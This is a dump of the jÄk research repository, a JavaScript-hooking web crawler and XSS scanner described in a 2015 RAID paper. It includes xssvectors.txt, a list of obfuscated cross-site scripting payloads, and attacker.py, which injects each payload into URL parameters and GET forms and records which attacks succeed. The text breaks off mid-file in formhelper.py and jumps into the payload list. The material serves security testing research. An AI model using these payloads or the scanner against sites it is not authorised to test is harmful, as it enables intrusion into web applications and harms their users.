├── .gitignore ├── LICENSE.txt ├── README.md └── crawler ├── analyzer ├── __init__.py ├── helper │ ├── __init__.py │ ├── formhelper.py │ ├── linkhelper.py │ └── propertyhelper.py └── mainanalyzer.py ├── attack ├── __init__.py ├── xss.py ├── xssvectors.txt └── xxxattacks.py ├── attacker.py ├── core ├── __init__.py ├── clustermanager.py ├── eventexecutor.py ├── formhandler.py ├── interactioncore.py ├── jaekcore.py └── jsbridge.py ├── crawler.py ├── database ├── __init__.py ├── database.py └── databasemanager.py ├── example.py ├── experiments_paper.py ├── js ├── addeventlistener_wrapper.js ├── ajax_interceptor.js ├── ajax_observer.js ├── lib.js ├── md5.js ├── property_obs.js └── timing_wrapper.js ├── main.py ├── models ├── __init__.py ├── ajaxrequest.py ├── asyncrequests.py ├── asyncrequeststructure.py ├── clickable.py ├── clickabletype.py ├── deltapage.py ├── enumerations.py ├── form.py ├── keyclickable.py ├── link.py ├── parametertype.py ├── timingrequest.py ├── url.py ├── urlstructure.py ├── utils.py └── webpage.py ├── network ├── __init__.py └── network.py ├── tests ├── __init__.py ├── databasetest.py └── domainhandlertest.py └── utils ├── __init__.py ├── asyncrequesthandler.py ├── config.py ├── domainhandler.py ├── execptions.py ├── requestor.py ├── user.py └── utils.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | .webkit-cache/ 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .cache 41 | nosetests.xml 42 | coverage.xml 43 | 44 | # Translations 45 | *.mo 46 | *.pot 47 | 48 | # Django stuff: 49 | *.log 50 | 51 | # Sphinx documentation 52 | docs/_build/ 53 | 54 | # PyBuilder 55 | target/ 56 | 57 | # Latex 58 | 59 | *.aux 60 | *.glo 61 | *.idx 62 | *.log 63 | *.toc 64 | *.ist 65 | *.acn 66 | *.acr 67 | *.alg 68 | *.bbl 69 | *.blg 70 | *.dvi 71 | *.glg 72 | *.gls 73 | *.ilg 74 | *.ind 75 | *.lof 76 | *.lot 77 | *.maf 78 | *.mtc 79 | *.mtc1 80 | *.out 81 | *.synctex.gz 82 | 83 | # Eclipse 84 | 85 | *.pydevproject 86 | .metadata 87 | .gradle 88 | bin/ 89 | tmp/ 90 | *.tmp 91 | *.bak 92 | *.swp 93 | *~.nib 94 | local.properties 95 | .settings/ 96 | .loadpath 97 | 98 | # External tool builders 99 | .externalToolBuilders/ 100 | 101 | # Locally stored "Eclipse launch configurations" 102 | *.launch 103 | 104 | # CDT-specific 105 | .cproject 106 | 107 | # PDT-specific 108 | .buildpath 109 | 110 | # sbteclipse plugin 111 | .target 112 | 113 | # TeXlipse plugin 114 | .texlipse 115 | 116 | crawler/similarities/ 117 | crawler/result/ 118 | crawler/database/databaselegacy.py 119 | 120 | main2.py 121 | 122 | .idea/ 123 | .project 124 | 125 | README 126 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jÄk - jet Änother krawler. 2 | 3 | jÄk (or jAEk, pron. Jack) is a web application crawler and scanner which uses dynamic JavaScript code analysis. jÄk installs hooks in JavaScript APIs in order to detect the registration of event handlers, the use of network communication APIs, and dynamically-generated URLs or user forms. It then builds and mantains a navigation graph to crawl and test web applications. For more details on the internals please have a look at [my thesis and our paper](#papers-and-further-readings) 4 | 5 | ## Requirements 6 | 7 | jÄk is written in python (version 3) and it is based on [PyQT5](https://riverbankcomputing.com/software/pyqt/intro) (version 5.3 - 5.4). To store data, jÄk uses mongodb via the [pymongo](https://api.mongodb.org/python/current/) 3.x.x bindings. Please, install the required packaged using pip, the packages manager of your distribution, or follow the documentation. jÄk also requires [cython](http://cython.org/). 8 | 9 | ## Running jÄk 10 | 11 | The current version of jÄk does not offer a command-line interface. To run jÄk, you will have to write some python code and get familiar with jÄk classes and libraries. The entry point to start using jÄk is [crawler/example.py](https://github.com/ConstantinT/jAEk/blob/master/crawler/example.py). 12 | 13 | ### 1. Configuration Objects 14 | 15 | #### 1.1 Users 16 | jÄk can use user credential and perform user login. The URL of the login page and the credential can be configured via the object `utils.user.User`. For example: 17 | 18 | ``` 19 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="1") 20 | ``` 21 | Parameters: 22 | 1. Name of the MongoDB database name (it can be an arbitrary name) 23 | 2. (Deprecated) Privilege Level of the User (0 is ok) 24 | 3. URL of the login page with the HTML form 25 | 4. Login data for the user login, e.g., `log` and `pwd` are the form input field names 26 | 5. If you want to use the credentials in parallel runs of jÄk with the same database, set >1 27 | 28 | #### 1.2 Crawler and Attacker Configuration 29 | 30 | ``` 31 | url = "http://localhost/ 32 | [...] 33 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast) 34 | attack_config = AttackConfig(url) 35 | ``` 36 | 37 | where: 38 | * `max_depth` is the maximum depth of the web application link tree; 39 | * `max_click_depth` is the maximum depth of click event that are fired; 40 | * `crawl_speed` specifies the time that the crawler waits after it loads a page or triggered an event. These are the possible values: 41 | * CrawlSpeed.Slow: 42 | * wait after loading: 1 sec. 43 | * wait after event: 2 sec. 44 | * CrawlSpeed.Medium: 45 | * wait after loading: 0.3 sec. 46 | * wait after event: 1 sec. 47 | * CrawlSpeed.Fast: 48 | * wait after loading: 0.1 sec. 49 | * wait after event: 0.5 sec. 50 | * CrawlSpeed.Speed_of_Lightning: 51 | * wait after loading: 0.01 sec. 52 | * wait after event: 0.1 sec. 53 | 54 | #### 1.3 Database 55 | 56 | ``` 57 | database_manager = DatabaseManager(user, dropping=True) 58 | ``` 59 | 60 | `user` is also an instance of the `User` class. 61 | 62 | ### 2 Setting up the Crawler 63 | 64 | To run the crawler use: 65 | 66 | ``` 67 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager) 68 | crawler.crawl(user) 69 | ``` 70 | 71 | You can also setup an HTTP proxy between the crawler and the web application (e.g., localhost:8082): 72 | 73 | ``` 74 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager, proxy="localhost", port=8082) 75 | crawler.crawl(user) 76 | ``` 77 | 78 | ## Papers and further readings 79 | 80 | * C. Tschürtz. *Improving Crawling with JavaScript Function Hooking* [DE: Verbesserung von Webcrawling durch JavaScript Funktion Hooking]. 81 | * G. Pellegrino, C. Tschürtz, E. Bodden, and C. Rossow. *jÄk: Using Dynamic Analysis to Crawl and Test Modern Web Applications*. Proceedings of Research in Attacks, Intrusions and Defenses (RAID) Symposium (RAID 2015). [PDF](http://trouge.net/papers/jAEk_raid2015.pdf) 82 | 83 | ## Contacts 84 | 85 | * C. Tschürtz *[constantin dot tschuertz (at) gmail dot com]* 86 | * G. Pellegrino *[gpellegrino (at) cispa dot saarland]* 87 | 88 | ## License 89 | 90 | See jÄk is released as General Public License version 3 or later (See L[ICENSE.txt](https://github.com/ConstantinT/jAEk/blob/master/LICENSE.txt)). 91 | -------------------------------------------------------------------------------- /crawler/analyzer/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | -------------------------------------------------------------------------------- /crawler/analyzer/helper/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/analyzer/helper/formhelper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | from models.form import HtmlForm, FormInput 20 | 21 | def extract_forms(frame): 22 | result = [] 23 | forms = frame.findAllElements("form") 24 | for form in forms: 25 | action = form.attribute("action") 26 | method = form.attribute("method") if form.attribute("method") == "post" else "get" 27 | dom_address = form.evaluateJavaScript("getXPath(this)") 28 | form_params = _extracting_information(form) 29 | result.append(HtmlForm(form_params, action, method, dom_address)) 30 | return result 31 | 32 | def _extracting_information(elem): 33 | result = [] 34 | inputs = elem.findAll("input") 35 | radio_buttons = {} # key = name, value = array mit values 36 | 37 | for input_el in inputs: 38 | tag_name = input_el.tagName() 39 | if input_el.hasAttribute("type"): 40 | input_type = input_el.attribute("type") 41 | if input_type != "radio": #no radio button 42 | if input_el.hasAttribute("name") or input_type == "submit": 43 | name = input_el.attribute("name") 44 | else: 45 | continue #A input-element without name has no impact, why waste memory? Ok jaek you are alright, if it is a submit element we need it... 46 | if input_el.hasAttribute("value"): 47 | value = [input_el.attribute("value")] 48 | else: 49 | value = [None] 50 | result.append(FormInput(tag_name, name, input_type, value)) 51 | else: # input is radiobutton 52 | name = input_el.attribute("name") 53 | if name in radio_buttons: # Radio-Button name exists 54 | radio_buttons[name].append(input_el.attribute("value")) 55 | else: #Radiobutton name exists not 56 | radio_buttons[name] = [] 57 | radio_buttons[name].append(input_el.attribute("value")) 58 | else: 59 | if input_el.hasAttribute("name"): 60 | name = input_el.attribute("name") 61 | tag_name = input_el.tagName() 62 | result.append(FormInput(tag_name, name, None, None)) 63 | for key in radio_buttons: 64 | result.append(FormInput(tag_name, key, input_type, radio_buttons[key])) 65 | buttons = elem.findAll("button") 66 | for button in buttons: 67 | tag_name = button.tagName() 68 | if button.hasAttribute("type"): 69 | button_type = button.attribute("type") 70 | else: 71 | button_type = None 72 | if button.hasAttribute("name"): 73 | name = button.attribute("name") 74 | else: 75 | name = None 76 | if button.hasAttribute("value"): 77 | value = [button.attribute("value")] 78 | else: 79 | value = None 80 | result.append(FormInput(tag_name, name, button_type, value)) 81 | 82 | selects = elem.findAll("select")# 19 | 20 | 21 | 22 | .txt 23 | .txt 24 | .txt" 25 |
.txt" 26 |
.txt 27 |
.txt 28 |
.txt 29 | .txt 30 | .txt 31 | IMG SRC=\"  javascript:jsb.attack(XSS);\">.txt 32 | .txt 33 | .txt 34 | .txt 35 | .txt 37 | .txt 38 | .txt 39 | .txt 40 | .txt 41 | .txt 42 | .txt 43 | .txt 44 | .txt 45 | .txt 46 | .txt 47 | .txt 48 | perl -e 'print \"\";' > out.txt 49 | .txt 50 |
.txt 51 | .txt 52 | .txt 53 | 54 | 55 | 56 | 57 | 58 | \"> 59 | 60 | 61 | 62 | 63 | perl -e 'print \"\";' > 64 | 65 | 66 | 67 | 68 | < 69 | 72 | 73 | 74 | 75 | 76 |
  • XSS
    77 | 78 | 79 | 80 | 81 |
    82 | 83 | 84 | 85 | exp/* 86 | 87 | 88 | 89 | 90 | ¼script¾jsb.attack(¢XSS¢)¼/script¾" 91 | 92 | 93 | 94 | 95 | 96 |
    97 |
    98 |
    99 |
    100 | 101 | 102 | a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d); 103 | cript:jsb.attack(XSS)\">\n 104 | \n 105 | \n\n\njsb.attack(\"XSS\")\">\n 106 | 107 | 108 | jsb.attack(\"XSS\")'); ?> 109 | jsb.attack(XSS)\"> 110 | +ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4- 111 | ;!--\'=&{()}\\xss 112 | "> 113 | < 114 | """" 115 | \\";jsb.attack(\'XSS\');// 116 | -------------------------------------------------------------------------------- /crawler/attack/xxxattacks.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | import os 20 | import random 21 | import string 22 | 23 | 24 | __author__ = 'constantin' 25 | 26 | 27 | FILENAME = "/xssvectors.txt" 28 | class XSSVectors(): 29 | 30 | def __init__(self): 31 | self.attack_vectors = [] 32 | for line in open(os.path.dirname(os.path.realpath(__file__)) + FILENAME, "r"): 33 | self.attack_vectors.append(line[:-1]) 34 | 35 | def random_string_generator(self, size=6, chars=string.ascii_uppercase + string.digits+string.ascii_lowercase): 36 | result = "" 37 | for i in range(size): 38 | result += random.choice(chars) 39 | return result 40 | 41 | def random_number_generator(self, size=6): 42 | i = 1 43 | max_num = "" 44 | min_num = "1" 45 | for i in range(size + 1): 46 | max_num += "9" 47 | min_num += "0" 48 | min_num = min_num[:-1] 49 | max_num = int(max_num) 50 | min_num = int(min_num) 51 | return str(random.randint(min_num, max_num)) 52 | -------------------------------------------------------------------------------- /crawler/attacker.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from asyncio.tasks import sleep 19 | import logging 20 | import sys 21 | from urllib.parse import urlparse 22 | 23 | 24 | from attack.xss import XSSAttacker, AttackResult 25 | from attack.xxxattacks import XSSVectors 26 | from core.jaekcore import JaekCore 27 | from models.url import Url 28 | from models.utils import CrawlSpeed 29 | from utils.domainhandler import DomainHandler 30 | from utils.execptions import LoginFailed 31 | 32 | 33 | 34 | __author__ = 'constantin' 35 | 36 | EMPTY_LIMIT = 5 37 | class Attacker(JaekCore): 38 | def __init__(self, config, proxy="", port=0, database_manager=None): 39 | super(Attacker, self).__init__(config, proxy="", port=0, database_manager=database_manager) 40 | 41 | self._xss = XSSAttacker(self, proxy, port, crawl_speed=CrawlSpeed.Medium, 42 | network_access_manager=self._network_access_manager) 43 | 44 | self._xss_vector = XSSVectors() 45 | 46 | def attack(self, user): 47 | self.domain_handler = DomainHandler(self.config.start_page_url, self.database_manager, cluster_manager=None) 48 | self.user = user 49 | if user.login_data is not None: 50 | self.process_with_login = True 51 | go_on = self._initial_login() 52 | if not go_on: 53 | raise LoginFailed("Initial login failed...") 54 | self.attack_all_urls_with_replacing() 55 | self.attack_all_urls_with_additions() 56 | self.attack_all_get_forms() 57 | #url = "http://localhost:8080/index.php/apps/files/ajax/download.php?files=moep&dir=tut" 58 | #url = "http://localhost:8080/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=t47sx79npgz01tywyeo3wwuuxz03u7vh" 59 | #url = "http://localhost:8080/admin.php?page=plugin-AdminTool%3Cimg%20onerror%3Dalert(123)%3B%20src%3Dx%3Es" 60 | #url = "http://localhost:8080/report.php?type=post&pid=1" 61 | #self.attack_single_url(url, replacement= True) 62 | 63 | 64 | def attack_single_url(self, url, replacement=False): 65 | if not replacement: 66 | attack_url = url 67 | result, response_code = self._xss.attack(attack_url, "123") 68 | logging.debug("Result: {}".format(result)) 69 | return 70 | url = Url(url) 71 | for parameter_to_attack in url.parameters: 72 | for vector in self._xss_vector.attack_vectors: 73 | attack_url = url.scheme + "://" + url.domain + url.path + "?" 74 | random_val = self._xss_vector.random_number_generator(12) 75 | ramdom_val = "123" 76 | for other_parameters in url.parameters: 77 | if parameter_to_attack == other_parameters: 78 | attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&" 79 | else: 80 | attack_url += other_parameters + "=" + url.parameters[other_parameters][0] + "&" 81 | attack_url = attack_url[:-1] # Removing the last "& 82 | logging.debug("Attack with: {}".format(attack_url)) 83 | result, response_code = self._xss.attack(attack_url, random_val) 84 | logging.debug("Result: {}".format(result)) 85 | 86 | 87 | def attack_all_urls_with_additions(self): 88 | domain = urlparse(self.config.start_page_url) 89 | domain = domain.netloc 90 | all_urls = self.database_manager.get_all_urls_to_domain(domain) 91 | for url in all_urls: 92 | if len(url.parameters) > 0: 93 | logging.debug("Now testing with url: {}".format(url.toString())) 94 | if self.process_with_login: 95 | self._handle_possible_logout() 96 | for parameter_to_attack in url.parameters: 97 | empty_counter = 0 98 | for vector in self._xss_vector.attack_vectors: 99 | attack_url = url.scheme + "://" + url.domain + url.path + "?" 100 | random_val = self._xss_vector.random_number_generator(12) 101 | for other_parameters in url.parameters: 102 | if parameter_to_attack == other_parameters: 103 | attack_url += other_parameters + "=" + str(url.parameters[other_parameters][0]) if url.parameters[other_parameters][0] is not None else "" 104 | attack_url += vector.replace("XSS", str(random_val)) + "&" 105 | else: 106 | attack_url += other_parameters + "=" 107 | attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else "" 108 | attack_url += "&" 109 | attack_url = attack_url[:-1] # Removing the last "& 110 | logging.debug("Attack with: {}".format(attack_url)) 111 | result, response_code = self._xss.attack(attack_url, random_val) 112 | if not self._check_login_status_with_cookies(): 113 | sleep(2000) 114 | self._initial_login() 115 | result, response_code = self._xss.attack(attack_url, random_val) 116 | if response_code is None: 117 | continue 118 | if response_code >= 400 or result == AttackResult.JSON: 119 | empty_counter = 42 120 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code)) 121 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed): 122 | self.database_manager.insert_attack_result(result, attack_url) 123 | empty_counter = 0 124 | else: 125 | empty_counter += 1 126 | if empty_counter > EMPTY_LIMIT: 127 | break 128 | 129 | 130 | 131 | def attack_all_urls_with_replacing(self): 132 | all_urls = self.database_manager.get_one_visited_url_per_structure() 133 | for url in all_urls: 134 | if len(url.parameters) > 0: 135 | logging.debug("Now testing with url: {}".format(url.toString())) 136 | if self.process_with_login: 137 | self._handle_possible_logout() 138 | for parameter_to_attack in url.parameters: 139 | empty_counter = 0 140 | for vector in self._xss_vector.attack_vectors: 141 | attack_url = url.scheme + "://" + url.domain + url.path + "?" 142 | random_val = self._xss_vector.random_number_generator(12) 143 | for other_parameters in url.parameters: 144 | if parameter_to_attack == other_parameters: 145 | attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&" 146 | else: 147 | attack_url += other_parameters + "=" 148 | attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else "" 149 | attack_url += "&" 150 | attack_url = attack_url[:-1] # Removing the last "& 151 | logging.debug("Attack with: {}".format(attack_url)) 152 | result, response_code = self._xss.attack(attack_url, random_val) 153 | if not self._check_login_status_with_cookies(): 154 | sleep(2000) 155 | self._initial_login() 156 | result, response_code = self._xss.attack(attack_url, random_val) 157 | if response_code is None: 158 | continue 159 | if response_code >= 400 or result == AttackResult.JSON: 160 | empty_counter = 42 161 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code)) 162 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed): 163 | self.database_manager.insert_attack_result(result, attack_url) 164 | empty_counter = 0 165 | else: 166 | empty_counter += 1 167 | if empty_counter > EMPTY_LIMIT: 168 | break 169 | 170 | def attack_all_get_forms(self): 171 | if self.process_with_login: 172 | self._handle_possible_logout() 173 | logging.debug("Attacking with get forms") 174 | all_forms = self.database_manager.get_one_form_per_destination() 175 | for form in all_forms: 176 | logging.debug(form.toString()) 177 | if "javascript" in form.action.complete_url: 178 | continue 179 | for param_to_attack in form.parameter: 180 | if param_to_attack.input_type == "submit" or param_to_attack.name is None: 181 | continue 182 | logging.debug("Now at paramerter {}".format(param_to_attack.toString())) 183 | empty_counter = 0 184 | for vector in self._xss_vector.attack_vectors: 185 | attack_url = form.action.complete_url + "?" 186 | random_val = self._xss_vector.random_number_generator(12) 187 | for other_parameter in form.parameter: 188 | if param_to_attack == other_parameter: 189 | if other_parameter is None or other_parameter.name is None: 190 | continue 191 | attack_url += other_parameter.name + "=" + vector.replace("XSS", random_val) + "&" 192 | else: 193 | if other_parameter.input_type == "submit" or other_parameter.name is None: 194 | continue 195 | elif other_parameter.values is None: 196 | attack_url += other_parameter.name + "=&" 197 | elif other_parameter.values[0] is not None: 198 | attack_url += other_parameter.name + "=" + other_parameter.values[0] + "&" 199 | else: 200 | attack_url += other_parameter.name + "=" + self._xss_vector.random_string_generator(6) + "&" 201 | attack_url = attack_url[:-1] 202 | logging.debug("Attack with: {}".format(attack_url)) 203 | result, response_code = self._xss.attack(attack_url, random_val) 204 | if not self._check_login_status_with_cookies(): 205 | sleep(2000) 206 | self._initial_login() 207 | result, response_code = self._xss.attack(attack_url, random_val) 208 | if response_code is None: 209 | continue 210 | if response_code >= 400 or result == AttackResult.JSON: 211 | empty_counter = 42 212 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code)) 213 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed): 214 | self.database_manager.insert_attack_result(result, attack_url) 215 | empty_counter = 0 216 | else: 217 | empty_counter += 1 218 | if empty_counter > EMPTY_LIMIT: 219 | break 220 | 221 | 222 | 223 | 224 | 225 | -------------------------------------------------------------------------------- /crawler/core/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/core/clustermanager.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import itertools 19 | import logging 20 | from copy import deepcopy 21 | from models.url import Url 22 | from utils.utils import calculate_similarity_between_pages 23 | 24 | 25 | __author__ = 'constantin' 26 | 27 | CLUSTER_THRESHOLD = .2 28 | 29 | class ClusterManager(): 30 | """ 31 | A cluster is a collection of similar pages, defined through a cluster function 32 | """ 33 | 34 | def __init__(self, persistence_manager): 35 | self._persistence_manager = persistence_manager 36 | self._similarity_cache = {} #Stores in a tripple: List(ids), result 37 | 38 | @property 39 | def get_clusters(self): 40 | return self._clusters 41 | 42 | def get_cluster(self, url_description): 43 | try: 44 | return self._clusters[url_description].values() 45 | except: 46 | raise KeyError("No cluster with that id found") 47 | 48 | def add_webpage_to_cluster(self, webpage): 49 | url = Url(webpage.url) 50 | clusters = self._persistence_manager.get_clusters(url.url_hash) 51 | if clusters is None: 52 | #self._clusters[url.url_hash] = [webpage.id] 53 | self._persistence_manager.write_clusters(url.url_hash, [webpage.id]) 54 | else: 55 | tmp = [] 56 | for c in clusters: 57 | if isinstance(c, list): 58 | tmp.extend(c) 59 | else: 60 | tmp.append(c) 61 | tmp.append(webpage.id) 62 | new_clusters = self.hierarchical_clustering(tmp, CLUSTER_THRESHOLD) 63 | for c in new_clusters: 64 | if isinstance(c, int): # Konvert integer to list, so mongo store all seperate single clusters in its own lists. 65 | new_clusters.remove(c) 66 | new_clusters.insert(0, [c]) 67 | self._persistence_manager.write_clusters(url.url_hash, new_clusters) 68 | 69 | 70 | def hierarchical_clustering(self, clusters, threshold): 71 | result = [] 72 | rest_clusters = clusters 73 | while len(rest_clusters) > 1: 74 | combinations_of_clusters = list(itertools.combinations(rest_clusters, 2)) 75 | distances = [] 76 | for combi in combinations_of_clusters: 77 | distance = self.calculate_minimum_distance(combi[0], combi[1]) 78 | distances.append((distance, combi[0], combi[1])) 79 | #distances = sorted(distances, key=lambda x: x[0]) 80 | min_distance = min(distances, key=lambda x: x[0]) 81 | if min_distance[0] > threshold: 82 | break 83 | else: 84 | rest_clusters.remove(min_distance[1]) 85 | rest_clusters.remove(min_distance[2]) 86 | if isinstance(min_distance[1], int): 87 | a = min_distance[1], 88 | else: 89 | a = min_distance[1] 90 | if isinstance(min_distance[2], int): 91 | b = min_distance[2], 92 | else: 93 | b = min_distance[2] 94 | new_cluster = a + b 95 | rest_clusters.append(new_cluster) 96 | return rest_clusters 97 | 98 | def calculate_minimum_distance(self, cluster1, cluster2): 99 | if isinstance(cluster1, int): 100 | cluster1 = [cluster1] 101 | else: 102 | cluster1 = list(cluster1) 103 | if isinstance(cluster2, int): 104 | cluster2 = [cluster2] 105 | else: 106 | cluster2 = list(cluster2) 107 | all_nodes = cluster1 + cluster2 108 | all_combinations = list(itertools.combinations(all_nodes, 2)) 109 | distances = [] 110 | for combi in all_combinations: 111 | if combi[0] in cluster1 and combi[1] in cluster1 or combi[0] in cluster2 and combi[1] in cluster2: 112 | continue 113 | distance = self.calculate_distance(combi[0], combi[1]) 114 | distances.append((combi[0], combi[1], distance)) 115 | min_distance = min(distances, key=lambda x: x[2]) 116 | return min_distance[2] 117 | 118 | def calculate_distance(self, x, y): 119 | name = self.get_similarity_identifier(x, y) 120 | if name in self._similarity_cache: 121 | result = self._similarity_cache[name] 122 | else: 123 | page_x = self._persistence_manager.get_web_page_to_id(x) 124 | page_y = self._persistence_manager.get_web_page_to_id(y) 125 | result = calculate_similarity_between_pages(page_x, page_y, verbose=True) 126 | self._similarity_cache[name] = result 127 | return 1 - result 128 | 129 | def get_similarity_identifier(self, x, y): 130 | name = (x, y) 131 | name = sorted(name) 132 | return str(name[0])+"$"+str(name[1]) 133 | 134 | def calculate_cluster_per_visited_urls(self, url_hash): 135 | try: 136 | return self.num_of_clusters(url_hash) / self.num_of_visited_urls(url_hash) 137 | except ZeroDivisionError: 138 | return 1.0 139 | 140 | def num_of_clusters(self, url_hash): 141 | clusters = self._persistence_manager.get_clusters(url_hash) 142 | if clusters is not None: 143 | return len(clusters) 144 | return 1.0 145 | 146 | def num_of_visited_urls(self, url_hash): 147 | return self._persistence_manager.count_visited_url_per_hash(url_hash) 148 | 149 | def need_more_urls_of_this_type(self, url_hash): 150 | """ 151 | :param url_hash: 152 | :return: if we have seen enough of an url or not 153 | """ 154 | return self.calculate_cluster_per_visited_urls(url_hash) > CLUSTER_THRESHOLD 155 | 156 | 157 | 158 | 159 | 160 | 161 | -------------------------------------------------------------------------------- /crawler/core/eventexecutor.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | import random 20 | import string 21 | from enum import Enum 22 | 23 | from PyQt5.Qt import QUrl 24 | from PyQt5.QtWebKitWidgets import QWebPage 25 | from analyzer.helper.formhelper import extract_forms 26 | from analyzer.helper.linkhelper import extract_links 27 | 28 | from analyzer.helper.propertyhelper import property_helper 29 | from models.ajaxrequest import AjaxRequest 30 | from models.deltapage import DeltaPage 31 | from models.enumerations import XHRBehavior 32 | from models.keyclickable import KeyClickable 33 | from core.interactioncore import InteractionCore 34 | from models.utils import CrawlSpeed, purge_dublicates 35 | 36 